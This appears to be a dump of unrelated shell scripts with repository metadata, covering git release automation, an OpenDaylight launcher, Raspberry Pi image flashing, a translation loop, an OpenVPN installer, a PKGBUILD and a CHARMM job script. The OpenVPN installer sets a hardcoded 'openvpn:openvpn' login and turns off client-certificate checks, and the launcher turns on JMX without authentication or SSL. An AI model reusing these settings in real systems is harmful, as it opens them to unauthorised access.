echo -e "With 'alternate' strategy:"
echo -e "Usage:\ngit release create|c [version]\n"
echo -e "git release finish|f\n"
}
# creates a release branch and optionally pushes it to the remote
function createRelease {
# assume current branch is a release/ branch
# if no version number is given
if [ -z "$VERSIONNUMBER" ]; then
echo -e "${red}⮕ ERROR:${normal} No release name given!"
exit 1
fi
# make sure version does not start with tag prefix
# but instead represents a valid semver syntax or npm version option.
if [[ ${VERSIONNUMBER:0:1} == "$VERSIONPREFIX" ]]; then
echo -e "${red}⮕ ERROR:${normal} Version starts with version tag prefix: '$VERSIONPREFIX'.${normal}"
echo -e "This is not allowed.\nUse full semver syntax like: 1.2.0"
echo -e "Or if you use alternate strategy, any of these npm version options:\nmajor, minor, patch."
exit 1
fi
case $STRATEGY in
alternate)
# make sure to checkout 'next' branch
if [ ! "$CURRENTBRANCH" == "$NEXTBRANCH" ]; then
git checkout "$NEXTBRANCH"
fi
# use npm version if package.json exists
if [ -f package.json ]; then
echo -e "${yellow}⮕${normal} Bump package version"
VERSION=$(npm --silent --no-git-tag-version version "$VERSIONNUMBER")
VERSIONTAG=$(echo "$VERSION" | tail -1)
RELEASEBRANCH="${RELEASEPREFIX}${VERSIONTAG}"
else
# warn if npm version param is given but no package.json found
if [[ $VERSIONNUMBER == 'major' || $VERSIONNUMBER == 'minor' || $VERSIONNUMBER == 'patch' ]]; then
echo -e "${red}⮕ ERROR:${normal} No package.json file found!${normal}"
exit 1
fi
fi
# checkout tmp release/ branch
echo -e "${yellow}⮕${normal} Create new release branch '${RELEASEBRANCH}'"
git checkout -b "$RELEASEBRANCH" "$NEXTBRANCH"
# extract version number without prefix
VERSION=${VERSIONTAG/#$VERSIONPREFIX/}
writeChangelogAlternate "$VERSION" &&
git add --all &&
git commit -m "Add release data to CHANGELOG" &&
echo -e "\n${green}⮕ Release branch $VERSION created.${normal}" &&
echo -e "Continue with updating the CHANGELOG.md and then call:\ngit release f"
exit 0
;;
*)
# checkout release/vxxx branch
git checkout -b "$RELEASEBRANCH" "$NEXTBRANCH"
echo "Make sure to publish the release if its not finished yet so others can add commits to it."
;;
esac
}
# pushes the branch to remote
function publishRelease {
git push -u origin "$RELEASEBRANCH"
}
# merges release branch into develop and creates
# fast forward merge into master to create release tag.
function finishRelease {
# assume current branch is a release/ branch
# if no version number is given
if [ -z "$VERSIONNUMBER" ]; then
# use current branch as the target
RELEASEBRANCH=$CURRENTBRANCH
# extract version tag from release/vX.X.X branch
VERSIONTAG=${RELEASEBRANCH/"$RELEASEPREFIX"/''}
# Make sure the branch starts with the release/ prefix
# otherwise abort and force manual usage over [version] parameter.
if [[ ! "$RELEASEBRANCH" =~ $RELEASEPREFIX ]]; then
echo -e "${red}⮕ ERROR:${normal} Couldn't find the right release branch.${normal}"
echo -e "Please give either a version name like this:"
echo -e "git release finish 1.5.0"
echo -e "or checkout the branch you want to finish."
usage
exit 1
fi
fi
# checkout release/vxxx branch
git checkout "$RELEASEBRANCH"
# this will set the LASTVERSION to the last
# annotated tag
if git describe --abbrev=0 "$MAINBRANCH" &>/dev/null; then
# get last annotated tag (= version tags)
LASTVERSION=$(git describe --abbrev=0 "$MAINBRANCH")
# use first commit as fallback if no version exists
else
# tell user there is no recent version
LASTVERSION='false'
echo "No recent version found."
echo "Using full history as reference."
fi
echo -e "Release: $RELEASEBRANCH"
echo -e "Version tag: $VERSIONTAG"
# write a changelog if needed
echo ""
read -p "Create CHANGELOG entry (Y/n)? " autocreateChangelog
if [ "$autocreateChangelog" == "Y" ]; then
# autocreate changelog from git log
createChangelogFromLog
# ask user if he wants to edit the changelog entry
echo -e "\n"
read -p "Do you want to edit the entry (Y/n)? " openChangelog
if [ "$openChangelog" == "Y" ]; then
nano _tmp-release-note.txt
fi
# finalize changelog
writeChangelog
# add it to the release commit
git add CHANGELOG.md
fi
# get tmp changelog if any
if [ -f _tmp-release-note.txt ]; then
RELEASENOTES="$(cat _tmp-release-note.txt)"
# remove tmp note
rm _tmp-release-note.txt
else
# use an empty release note as fallback
RELEASENOTES=''
fi
# write version inside a .version file
# and add it to the next commit
echo "$VERSIONTAG" >.version && git add .version
# Create final commit with updated changelog
git commit -m "Release $VERSIONTAG" -m "$RELEASENOTES"
# merge release/vxxx into develop
git checkout "$NEXTBRANCH"
git merge "$RELEASEBRANCH"
# update master with release changes from develop
git checkout "$MAINBRANCH"
git merge "$NEXTBRANCH" -m "Release $VERSIONTAG"
# Create version tag on master
git tag -a "$VERSIONTAG" "$NEXTBRANCH" -m "Release $VERSIONTAG" -m "$RELEASENOTES"
if [ $HASREMOTE == 1 ]; then
# push the branches
git push origin "$NEXTBRANCH" --follow-tags
git push origin "$MAINBRANCH" --follow-tags
fi
if [ $? -eq 0 ]; then
echo -e "⮕ ${green}Release $VERSIONTAG successfully finished!${normal}"
else
echo -e "${red}⮕ ERROR:${normal} Problems occured during creation of release:${normal} $VERSIONTAG"
exit 1
fi
# Remove release branch as its fully merged into develop
git branch -d "$RELEASEBRANCH"
# finally check out 'next' branch so users don't accidentaly
# continue working on the 'main' branch.
git checkout "$NEXTBRANCH" &>/dev/null
}
# used by 'alternate' strategy.
function finishReleaseAlternate {
# make sure user is on a release branch otherwise warn and exit
if [[ ! $CURRENTBRANCH == $RELEASEPREFIX* ]]; then
echo -e "${red}⮕ ERROR:${normal} Current branch '${CURRENTBRANCH}' is not a valid release branch! Check out the right one and try again."
exit 1
else
RELEASEBRANCH=$CURRENTBRANCH
fi
git checkout "$RELEASEBRANCH"
echo -e "${yellow}⮕${normal} Create release ${CURRENTVERSION}"
# make sure everything is added
if [ -n "$(git status --porcelain)" ]; then
echo -e "${yellow}⮕${normal} Changes detected - committing..."
git add --all
git commit -m "Clean working directory for ${CURRENTVERSION}"
fi
echo -e "${yellow}⮕${normal} Squash merge release into '${NEXTBRANCH}'"
# squash merge release branch into 'next'
git checkout "$NEXTBRANCH"
git merge --squash "$RELEASEBRANCH"
# commit the merge as release commit
echo -e "${yellow}⮕${normal} Commit squash merge"
git add --all
git commit -m "Release ${CURRENTVERSION}"
# add the release tag to it
echo -e "${yellow}⮕${normal} Create release tag ${VERSIONPREFIX}${CURRENTVERSION}"
git tag -a "${VERSIONPREFIX}${CURRENTVERSION}" -m "Release ${CURRENTVERSION}"
# merge into 'main' branch
echo -e "${yellow}⮕${normal} Merge release into '$NEXTBRANCH'"
git checkout "$MAINBRANCH"
git merge "$NEXTBRANCH"
# push if remote exists
if [ $HASREMOTE == 1 ]; then
echo -e "${yellow}⮕${normal} Push release"
git push --follow-tags
fi
# check for errors otherwise delete release branch
if [ $? -eq 0 ]; then
# delete release/ branch
echo -e "${yellow}⮕${normal} Delete '$RELEASEBRANCH'"
git branch -D "$RELEASEBRANCH"
# finally check out 'next' branch so users don't
# continue working on the 'main' branch
echo -e "${yellow}⮕${normal} Checkout '$NEXTBRANCH'"
git checkout "$NEXTBRANCH" &>/dev/null
# final finish message
echo -e "${green}⮕ Release ${CURRENTVERSION} finished!${normal}"
else
echo -e "${red}⮕ ERROR:${normal} Problems occured during creation of release:${normal} $CURRENTVERSION"
exit 1
fi
}
# Automatically prepends an entry in the CHANGELOG.md file based on
# the commit messages between the last release tag.
# Will prompt the user if they want to autocreate the entry and if they
# want to manually edit it afterwards.
function writeChangelog {
# start version headline in tmp release message
echo "## ${VERSIONTAG}" >_tmp-release-message.md
cat _tmp-release-note.txt >>_tmp-release-message.md
echo -e "\n" >>_tmp-release-message.md
# add old changelog data
cat CHANGELOG.md >>_tmp-release-message.md
# overwrite changelog
mv _tmp-release-message.md CHANGELOG.md
# tell user our success
echo -e "⮕ ${green}Successfully added changelog entry for:${normal} $VERSIONTAG."
}
function createChangelogFromLog {
# use full git log as reference if no version exist
if [ "$LASTVERSION" = 'false' ]; then
git log --pretty=format:"- %s" "$NEXTBRANCH" >_tmp-release-note.txt
# use latest annotated tag as reference if it exists
else
# save log output to tmp release note
git log --pretty=format:"- %s" "$LASTVERSION"..."$NEXTBRANCH" >_tmp-release-note.txt
fi
echo "Content:"
cat _tmp-release-note.txt
}
function cleanChangelogEntry {
if [[ -n $TICKETURL ]] && [[ -n $TICKETPATTERN ]]; then
echo "$1" | tr '\n' ' ' | sed 's/\+\+\!\!/\n-/g' | sed 's/_body__body_//' | sed 's/\#resolve//' | sed 's/\#close//' | sed "s~\(${TICKETPATTERN}\S*\)~(\[\1\](${TICKETURL}\1))~" | sed 's/_body__//' | sed 's/__body_//'
else
echo "$1" | tr '\n' ' ' | sed 's/\+\+\!\!/\n-/g'
fi
}
# Automatically prepends an entry in the CHANGELOG.md
# file based on the commit messages between the last release tag.
# Will prompt the user if they want to autocreate the
# entry and if they want to manually edit it afterwards.
function writeChangelogAlternate {
VERSION="$1"
DATE=$(date +%Y-%m-%d)
HEADLINE="# ${VERSION} - ${DATE}"
echo -e "${yellow}⮕${normal} Update CHANGELOG.md for $VERSION"
if [[ -n $COMMITURL ]]; then
COMMITLINK=${COMMITURL/"{commit}"/"%H"}
COMMITLINK="([%h]($COMMITLINK))"
else
COMMITLINK="(%h)"
fi
echo "last version: $LASTVERSION"
# change commit format to support ticket extraction
if [[ -n $TICKETURL ]] && [[ -n $TICKETPATTERN ]]; then
COMMITLINK="${COMMITLINK} _body__%b__body_"
fi
LOG_ALL=$(git log --pretty=format:"++!! %s $COMMITLINK" "$LASTVERSION".."$NEXTBRANCH")
LOG_ALL=$(cleanChangelogEntry "$LOG_ALL")
LOG_FIXED=$(echo "$LOG_ALL" | grep '\[fix\]')
LOG_CHANGED=$(echo "$LOG_ALL" | grep '\[change\]')
LOG_ADDED=$(echo "$LOG_ALL" | grep '\[add\]')
LOG_BREAKS=$(echo "$LOG_ALL" | grep '\[break\]')
LOG_MISC=$(echo "$LOG_ALL" | grep -v "\[change\|\[fix\|\[add\|\[break")
# use url to branch comparison between old and new release
if [[ -n $COMPAREURL ]]; then
COMPAREURL=${COMPAREURL/"{old}"/$LASTVERSION}
COMPAREURL=${COMPAREURL/"{new}"/$VERSIONPREFIX$VERSION}
HEADLINE="# [${VERSION}](${COMPAREURL}) - ${DATE}"
fi
# start default changelog block
TMPCONTENT="$HEADLINE"
if [ -n "$LOG_BREAKS" ]; then
LOG_BREAKS="${LOG_BREAKS// \[break\]/''}"
TMPCONTENT+="\n\n### Breaking changes\n\n$LOG_BREAKS"
fi
if [ -n "$LOG_FIXED" ]; then
LOG_FIXED="${LOG_FIXED// \[fix\]/''}"
TMPCONTENT+="\n\n### Fixed\n\n$LOG_FIXED"
fi
if [ -n "$LOG_ADDED" ]; then
LOG_ADDED="${LOG_ADDED// \[add\]/''}"
TMPCONTENT+="\n\n### Added\n\n$LOG_ADDED"
fi
if [ -n "$LOG_CHANGED" ]; then
LOG_CHANGED="${LOG_CHANGED// \[change\]/''}"
TMPCONTENT+="\n\n### Changed\n\n$LOG_CHANGED"
fi
if [ -n "$LOG_MISC" ]; then
TMPCONTENT+="\n\n### Misc\n\n$LOG_MISC"
fi
# add final new line
TMPCONTENT+="\n"
# sanitize multiple whitespaces
TMPCONTENT=$(echo "$TMPCONTENT" | tr -s ' ')
# put content into tmp changelog
echo -e "$TMPCONTENT" >$TMPRELEASEMSG
# attach old changelog content if it exists
if [ -f CHANGELOG.md ]; then
cat CHANGELOG.md >>$TMPRELEASEMSG
fi
# overwrite original changelog file
# and delete tmp files
mv $TMPRELEASEMSG CHANGELOG.md
}
# =================================
# CHECKS
# =================================
# abort if working directory is dirty
if [ "$WORKINGDIRDIRTY" ] && [ "$STRATEGY" == "default" ]; then
echo -e "${red}⮕ ERROR:${normal} Your working directory is dirty!\n"
git status
exit 1
fi
# make sure the branches are up to date
if git checkout "$NEXTBRANCH" &>/dev/null &&
[ $HASREMOTE == 1 ] &&
[ "$(git rev-parse HEAD)" != "$(git rev-parse @{u})" ]; then
echo -e "${red}⮕ERR:${normal} HEAD and origin/HEAD are deviated!${normal}"
echo -e "Make sure you merged/pulled new commits."
echo ""
git status
exit 1
fi
# abort if version tag already exists
if [ "$(git tag -l "$VERSIONTAG")" ]; then
echo -e "${red}⮕ ERROR:${normal} Version already exists!${normal}\n"
git show "$VERSIONTAG"
exit 1
fi
# =================================
# EXECUTION
# =================================
case "$CMD" in
create)
createRelease
exit
;;
publish)
if [ "$STRATEGY" == 'alternate' ]; then
echo "Publish does not work with 'alternate' strategy, because it will be published during 'git release f'."
else
publishRelease
fi
exit
;;
finish)
if [ "$STRATEGY" == 'alternate' ]; then
finishReleaseAlternate
else
finishRelease
fi
exit
;;
esac
| true |
ef71879ca82fa23b52146b8b218cedc6d9fd1b29 | Shell | NachtZ/bohatei | /backend/controller/toolkit/main/src/main/resources/run.sh | UTF-8 | 8,249 | 3.734375 | 4 | [
"BSD-2-Clause"
] | permissive | #!/bin/bash
platform='unknown'
unamestr=`uname`
if [[ "$unamestr" == 'Linux' ]]; then
platform='linux'
elif [[ "$unamestr" == 'Darwin' ]]; then
platform='osx'
fi
if [[ $platform == 'linux' ]]; then
fullpath=`readlink -f $0`
if [[ -z ${JAVA_HOME} ]]; then
# Find the actual location of the Java launcher:
java_launcher=`which java`
java_launcher=`readlink -f "${java_launcher}"`
# Compute the Java home from the location of the Java launcher:
export JAVA_HOME="${java_launcher%/bin/java}"
fi
elif [[ $platform == 'osx' ]]; then
TARGET_FILE=$0
cd `dirname "$TARGET_FILE"`
TARGET_FILE=`basename $TARGET_FILE`
# Iterate down a (possible) chain of symlinks
while [ -L "$TARGET_FILE" ]
do
TARGET_FILE=`readlink "$TARGET_FILE"`
cd `dirname "$TARGET_FILE"`
TARGET_FILE=`basename "$TARGET_FILE"`
done
# Compute the canonicalized name by finding the physical path
# for the directory we're in and appending the target file.
PHYS_DIR=`pwd -P`
RESULT=$PHYS_DIR/$TARGET_FILE
fullpath=$RESULT
[[ -z ${JAVA_HOME} ]] && [[ -x "/usr/libexec/java_home" ]] && export JAVA_HOME=`/usr/libexec/java_home -v 1.7`;
fi
[[ -z ${JAVA_HOME} ]] && echo "Need to set JAVA_HOME environment variable" && exit -1;
[[ ! -x ${JAVA_HOME}/bin/java ]] && echo "Cannot find an executable \
JVM at path ${JAVA_HOME}/bin/java check your JAVA_HOME" && exit -1;
if [ -z ${ODL_BASEDIR} ]; then
basedir=`dirname "${fullpath}"`
else
basedir=${ODL_BASEDIR}
fi
if [ -z ${ODL_DATADIR} ]; then
datadir=`dirname "${fullpath}"`
else
datadir=${ODL_DATADIR}
fi
function usage {
echo "Usage: $0 [-jmx] [-jmxport <num>] [-debug] [-debugsuspend] [-debugport <num>] [-start [<console port>]] [-stop] [-status] [-console] [-help] [-agentpath:<path to lib>] [<other args will automatically be used for the JVM>]"
exit 1
}
if [ -z ${TMP} ]; then
pidfile="/tmp/opendaylight.PID"
else
pidfile="${TMP}/opendaylight.PID"
fi
debug=0
debugsuspend=0
debugport=8000
debugportread=""
startdaemon=0
daemonport=2400
daemonportread=""
jmxport=1088
jmxportread=""
startjmx=0
stopdaemon=0
statusdaemon=0
consolestart=1
dohelp=0
extraJVMOpts=""
agentPath=""
unknown_option=0
while true ; do
case "$1" in
-debug) debug=1; shift ;;
-jmx) startjmx=1; shift ;;
-debugsuspend) debugsuspend=1; shift ;;
-debugport) shift; debugportread="$1"; if [[ "${debugportread}" =~ ^[0-9]+$ ]] ; then debugport=${debugportread}; shift; else echo "-debugport expects a number but was not found"; exit -1; fi;;
-jmxport) shift; jmxportread="$1"; if [[ "${jmxportread}" =~ ^[0-9]+$ ]] ; then jmxport=${jmxportread}; shift; else echo "-jmxport expects a number but was not found"; exit -1; fi;;
-start) startdaemon=1; shift; daemonportread="$1"; if [[ "${daemonportread}" =~ ^[0-9]+$ ]] ; then daemonport=${daemonportread}; shift; fi;;
-stop) stopdaemon=1; shift ;;
-status) statusdaemon=1; shift ;;
-console) shift ;;
-help) dohelp=1; shift;;
-D*) extraJVMOpts="${extraJVMOpts} $1"; shift;;
-X*) extraJVMOpts="${extraJVMOpts} $1"; shift;;
-agentpath:*) agentPath="$1"; shift;;
"") break ;;
*) echo "Unknown option $1"; unknown_option=1; shift ;;
esac
done
# Unknown Options and help
if [ "${unknown_option}" -eq 1 ]; then
usage
fi
if [ "${dohelp}" -eq 1 ]; then
usage
fi
# Validate debug port
if [[ "${debugport}" -lt 1024 ]] || [[ "${debugport}" -gt 65535 ]]; then
echo "Debug Port not in the range [1024,65535] ${debugport}"
exit -1
fi
# Validate daemon console port
if [[ "${daemonport}" -lt 1024 ]] || [[ "${daemonport}" -gt 65535 ]]; then
echo "Daemon console Port not in the range [1024,65535] value is ${daemonport}"
exit -1
fi
# Validate jmx port
if [[ "${jmxport}" -lt 1024 ]] || [[ "${jmxport}" -gt 65535 ]]; then
echo "JMX Port not in the range [1024,65535] value is ${jmxport}"
exit -1
fi
# Debug options
if [ "${debugsuspend}" -eq 1 ]; then
extraJVMOpts="${extraJVMOpts} -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=${debugport}"
elif [ "${debug}" -eq 1 ]; then
extraJVMOpts="${extraJVMOpts} -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=${debugport}"
fi
# Add JMX support
if [ "${startjmx}" -eq 1 ]; then
extraJVMOpts="${extraJVMOpts} -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.port=${jmxport} -Dcom.sun.management.jmxremote"
fi
########################################
# Now add to classpath the OSGi JAR
########################################
CLASSPATH=${CLASSPATH}:${basedir}/lib/org.eclipse.osgi-3.8.1.v20120830-144521.jar
FWCLASSPATH=file:"${basedir}"/lib/org.eclipse.osgi-3.8.1.v20120830-144521.jar
########################################
# Now add the extensions
########################################
# Extension 1: this is used to be able to convert all the
# bundleresouce: URL in file: so packages that are not OSGi ready can
# still work. Notably this is the case for spring classes
CLASSPATH=${CLASSPATH}:${basedir}/lib/org.eclipse.virgo.kernel.equinox.extensions-3.6.0.RELEASE.jar
FWCLASSPATH=${FWCLASSPATH},file:${basedir}/lib/org.eclipse.virgo.kernel.equinox.extensions-3.6.0.RELEASE.jar
########################################
# Now add the launcher
########################################
CLASSPATH=${CLASSPATH}:${basedir}/lib/org.eclipse.equinox.launcher-1.3.0.v20120522-1813.jar
FWCLASSPATH=${FWCLASSPATH},file:${basedir}/lib/org.eclipse.equinox.launcher-1.3.0.v20120522-1813.jar
cd $basedir
if [ "${stopdaemon}" -eq 1 ]; then
if [ -e "${pidfile}" ]; then
daemonpid=`cat "${pidfile}"`
kill "${daemonpid}"
rm -f "${pidfile}"
echo "Controller with PID: ${daemonpid} -- Stopped!"
exit 0
else
echo "Doesn't seem any Controller daemon is currently running"
exit -1
fi
fi
if [ "${statusdaemon}" -eq 1 ]; then
if [ -e "${pidfile}" ]; then
daemonpid=`cat "${pidfile}"`
ps -p ${daemonpid} > /dev/null
daemonexists=$?
if [ "${daemonexists}" -eq 0 ]; then
echo "Controller with PID: ${daemonpid} -- Running!"
exit 0
else
echo "Controller with PID: ${daemonpid} -- Doesn't seem to exist"
rm -f "${pidfile}"
exit 1
fi
else
echo "Doesn't seem any Controller daemon is currently running, at least no PID file has been found"
exit -1
fi
fi
iotmpdir=`echo "${datadir}" | sed 's/ /\\ /g'`
bdir=`echo "${basedir}" | sed 's/ /\\ /g'`
confarea=`echo "${datadir}" | sed 's/ /\\ /g'`
fwclasspath=`echo "${FWCLASSPATH}" | sed 's/ /\\ /g'`
if [ "${startdaemon}" -eq 1 ]; then
if [ -e "${pidfile}" ]; then
echo "Another instance of controller running, check with $0 -status"
exit -1
fi
$JAVA_HOME/bin/java ${extraJVMOpts} \
${agentPath} \
-Djava.io.tmpdir="${iotmpdir}/work/tmp" \
-Dosgi.install.area="${bdir}" \
-Dosgi.configuration.area="${confarea}/configuration" \
-Dosgi.frameworkClassPath="${fwclasspath}" \
-Dosgi.framework=file:"${bdir}/lib/org.eclipse.osgi-3.8.1.v20120830-144521.jar" \
-Djava.awt.headless=true \
-classpath "${CLASSPATH}" \
org.eclipse.equinox.launcher.Main \
-console ${daemonport} \
-consoleLog &
daemonpid=$!
echo ${daemonpid} > ${pidfile}
elif [ "${consolestart}" -eq 1 ]; then
if [ -e "${pidfile}" ]; then
echo "Another instance of controller running, check with $0 -status"
exit -1
fi
java ${extraJVMOpts} \
${agentPath} \
-Djava.io.tmpdir="${iotmpdir}/work/tmp" \
-Dosgi.install.area="${bdir}" \
-Dosgi.configuration.area="${confarea}/configuration" \
-Dosgi.frameworkClassPath="${fwclasspath}" \
-Dosgi.framework=file:"${bdir}/lib/org.eclipse.osgi-3.8.1.v20120830-144521.jar" \
-Djava.awt.headless=true \
-classpath "${CLASSPATH}" \
org.eclipse.equinox.launcher.Main \
-console \
-consoleLog
fi
| true |
0b1bf1cd12b63fe89fcc6da009075f0d7570898b | Shell | Kaixin-Wu/nematus_simple | /script/beam_search_exp.sh | UTF-8 | 530 | 2.640625 | 3 | [] | no_license | model=../data/c2e.180W.gen/model/finetune/model.npz.best_bleu
input=../data/c2e.180W.gen/test/mt08/c.utf8.token
beam_size=(1 4 8 12 16 20)
replace=1
ref=../data/c2e.180W.gen/test/mt08/test.txt
refnum=4
len=${#beam_size[*]}
for k in $( seq 0 $(expr $len - 1))
do
k=${beam_size[$k]}
output=../data/c2e.180W.gen/test/mt08/c.utf8.token.trans.k$k
echo "./translate.sh -m $model -t $input -o $output -r $replace -d $ref -n $refnum -k $k"
./translate.sh -m $model -t $input -o $output -r $replace -d $ref -n $refnum -k $k
done
| true |
24e0bb0a2d568a053d36cf70f3286af7af2a7bd2 | Shell | tlewis11/raspberrypi-hacking | /rpi_image_utils.sh | UTF-8 | 586 | 4.125 | 4 | [] | no_license | #!/bin/bash
get_image(){
local image_url='https://downloads.raspberrypi.org/raspbian_latest'
wget $image_url
}
flash_image(){
if [ "$#" -ne 2 ];
then
echo 'Usage: flash_image imagefile diskpath'
exit 1
fi
local image_filename="$1"
local disk_path="$2"
echo "Are you sure you want to flash the disk image $image_filename to the disk at $disk_path. only 'yes' will succeed"
read answer
echo "answer: $answer"
if [ "$answer" == "yes" ];
then
echo "copying $image_filename to $disk_path"
sudo dd bs=1M if=$image_filename of=$disk_path
fi
}
| true |
73540962567def1684cd6801592e21d423dd7c59 | Shell | gusha987/via-piudzpa-helper-files | /asteroids/prepare_dev_env.sh | UTF-8 | 2,329 | 3.375 | 3 | [] | no_license | #!/bin/bash
sec_secret_storage_loc="/my_secret_files"
echo "Script for preparing the development environment"
echo "------------------------------------------------"
echo "Checking if config.ini exists in the current working dir -->"
if test -f "config.ini"; then
echo "exists"
else
echo "Copying config file from secure secret storage"
cp $HOME$sec_secret_storage_loc/config.ini .
if [ $? -eq 0 ]; then echo "OK"; else echo "Problem copying config.ini file"; exit 1; fi
fi
echo "------------------------------------------------"
echo "Checking if log_worker.yaml exists in the current working dir -->"
if test -f "log_worker.yaml"; then
echo "exists"
else
echo "Copying log config file from local dev template log_worker.yaml.dev"
cp log_worker.yaml.dev log_worker.yaml
if [ $? -eq 0 ]; then echo "OK"; else echo "Problem copying log_worker.yaml file"; exit 1; fi
fi
echo "------------------------------------------------"
echo "Checking if log_migrate_db.yaml exists in the current working dir -->"
if test -f "log_migrate_db.yaml"; then
echo "exists"
else
echo "Copying log config file from local dev template log_migrate_db.yaml.dev"
cp log_migrate_db.yaml.dev log_migrate_db.yaml
if [ $? -eq 0 ]; then echo "OK"; else echo "Problem copying log_migrate_db.yaml file"; exit 1; fi
fi
echo "------------------------------------------------"
echo "Getting python3 executable loc"
python_exec_loc=$(which python3)
if [ $? -eq 0 ]; then echo "OK"; else echo "Problem getting python3 exec location"; exit 1; fi
echo "$python_exec_loc"
echo "------------------------------------------------"
echo "Running config tests"
$python_exec_loc test_config.py
if [ $? -eq 0 ]; then echo "OK"; else echo "Configuration test FAILED"; exit 1; fi
echo "------------------------------------------------"
echo "Running DB migrations"
$python_exec_loc migrate_db.py
if [ $? -eq 0 ]; then echo "OK"; else echo "DB migration FAILED"; exit 1; fi
echo "------------------------------------------------"
echo "Running asteroid worker tests"
$python_exec_loc test_worker.py
if [ $? -eq 0 ]; then echo "OK"; else echo "Worker test FAILED"; exit 1; fi
echo "------------------------------------------------"
echo "ALL SET UP! YOU ARE READY TO CODE"
echo "to start the program, execute:"
echo "$python_exec_loc worker_2_db.py"
| true |
85cc0ff5937af2a26100189a315602ddd6db2534 | Shell | gesundes/nexus-test-new | /roles/openvpn-ami/files/install_openvpn.sh | UTF-8 | 1,279 | 2.71875 | 3 | [] | no_license | #!/bin/bash
useradd openvpn
echo "openvpn:openvpn" | chpasswd
echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf
apt update && DEBIAN_FRONTEND=noninteractive apt install openvpn easy-rsa iptables-persistent -y
#Configure iptables
cat > /etc/iptables/rules.v4 <<EOF
*nat
:PREROUTING ACCEPT [41:2519]
:INPUT ACCEPT [18:1004]
:OUTPUT ACCEPT [101:9220]
:POSTROUTING ACCEPT [101:9220]
-A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE
COMMIT
EOF
# Configure OpenVPN
cp -r /usr/share/easy-rsa /etc/openvpn
cd /usr/share/easy-rsa
cp openssl-1.0.0.cnf openssl.cnf
source vars
./clean-all
./pkitool --initca
cp ./keys/ca.crt /home/ubuntu
chown ubuntu:ubuntu /home/ubuntu/ca.crt
./pkitool --server server
./build-dh
cp ./keys/* /etc/openvpn
cat > /etc/openvpn/server.conf <<EOF
port 1194
proto tcp
dev tun
ca ca.crt
cert server.crt
key server.key
dh dh2048.pem
server 10.8.0.0 255.255.255.0
keepalive 10 120
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
verify-client-cert none
plugin /usr/lib/x86_64-linux-gnu/openvpn/plugins/openvpn-plugin-auth-pam.so login
status openvpn-status.log
verb 3
push "route 10.0.0.0 255.255.0.0"
push "dhcp-option DNS 10.0.0.2"
EOF
sleep 10
systemctl daemon-reload
systemctl start openvpn
systemctl start openvpn
systemctl enable openvpn
| true |
0daaefa26aa1af0a0d13cf8609120b50889be20b | Shell | delkyd/alfheim_linux-PKGBUILDS | /teleprompter-git/PKGBUILD | UTF-8 | 883 | 2.71875 | 3 | [] | no_license | # Maintainer: Michael DeGuzis <mdeguzis@gmail.com>
pkgname=teleprompter-git
pkgver=r122.36db364
pkgrel=1
pkgdesc="Professional-grade, multi-platform, free software teleprompter, installed through npm"
arch=('any')
url="www.imaginary.tech/teleprompter"
license=('GPLv3')
depends=('git' 'nodejs')
makedepends=('npm')
options=(!emptydirs)
source=('teleprompter-git::git+https://github.com/imaginaryfilms/Teleprompter-Core.git')
sha256sums=('SKIP')
pkgver() {
cd "$srcdir/$pkgname"
printf "r%s.%s" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)"
}
package() {
cd "$pkgname"
mkdir -p $pkgdir/usr
npm install --user root -g --prefix="$pkgdir/usr"
install -D -m644 LICENSE "$pkgdir/usr/share/licenses/$pkgname/LICENSE"
find "${pkgdir}" -name "package.json" -exec sed -e "s|${pkgdir}||" -i {} \;
find "${pkgdir}" -name "package.json" -exec sed -e "s|${srcdir}||" -i {} \;
}
| true |
7cdb145028e9aedcf288ad2b8db698629e452b72 | Shell | busathlab/mdlab | /labs/lab8_perturbation/submit.sh | UTF-8 | 3,607 | 3.453125 | 3 | [] | no_license | #!/bin/bash
#################################
### FOR USE ONLY WITH TSM LAB ###
### MGLEED 29 May 2014 ###
#################################
### Define these variables ###
#Is this a water simulation or a 2kqt simulation? (water/2kqt)
export type=2kqt
#Is this for a dynamics script or a post-processing script? (0 if dynamics, 1 if post-processing script)
export simtype=1
#Which values of lambda would you like to simulate? (If for post-processing, ensure match in lambda vars near script end)
export lambdas=( ".05" ".125" ".5" ".875" ".95" )
export numlambdas=5
#Drug ID's for TSM (mutate drug1 to drug2); e.g. use 035 for Amt and 150 for Rim
export drug1=035
export drug2=150
#For dynamics only...Is this a restart? (0 if heating, 1 or more for restart level)
export rst=1
#For post-processing only...What was the last restart number performed?
export lastrestart=1
#Random-number-generator seed (optional)
export iseed=21951
#######################################################
# Shouldn't need to change anything beyond this point #
#######################################################
submitscript=batch.submit
# Create submission scripts via here-document
cat <<"EOF" > $submitscript
#!/bin/bash
#SBATCH
cd "$SLURM_SUBMIT_DIR"
module purge
module load charmm
if [ $simtype == 0 ]; then
export OMP_NUM_THREADS=$SLURM_CPUS_ON_NODE
mpirun $(which charmm) drug1:$drug1 drug2:$drug2 iseed:$iseed rst:$rst L:${L} type:$type < $INFILE > $OUTFILE
else
$(which charmm) numlambdas:$numlambdas drug1:$drug1 drug2:$drug2 lambda4:$lambda4 lambda5:$lambda5 lambda1:$lambda1 lambda2:$lambda2 lambda3:$lambda3 OUTFILE:$OUTFILE lastrestart:$lastrestart type:$type < $INFILE > $OUTFILE
fi
exit 0
EOF
chmod 770 $submitscript
if [ $simtype == 0 ]; then
if [ $rst == 0 ]; then
export htrst=heat
wallhours=1
else
export htrst=restart
wallhours=120
fi
for submission in $(seq 0 $(($numlambdas - 1))); do
export L=${lambdas[$submission]}
export INFILE=tsm.${htrst}_${type}.str
export OUTFILE=log/log.tsm_150_${type}_${rst}_${L}
echo "Submitting ${type} lambda=${L} restart=${rst}"
if [ $type == water ]; then
sbatch -J "fe.${rst}.${L}.${type}" -e "log/slurm/fe.${rst}.${L}.${type}.e%j" -o "log/slurm/fe.${rst}.${L}.${type}.o%j" -N1 -n8 --mem-per-cpu=2G -t${wallhours}:00:00 ${submitscript}
else
##BILAYER SIMULATION NEEDS LOTS OF RESOURCES...
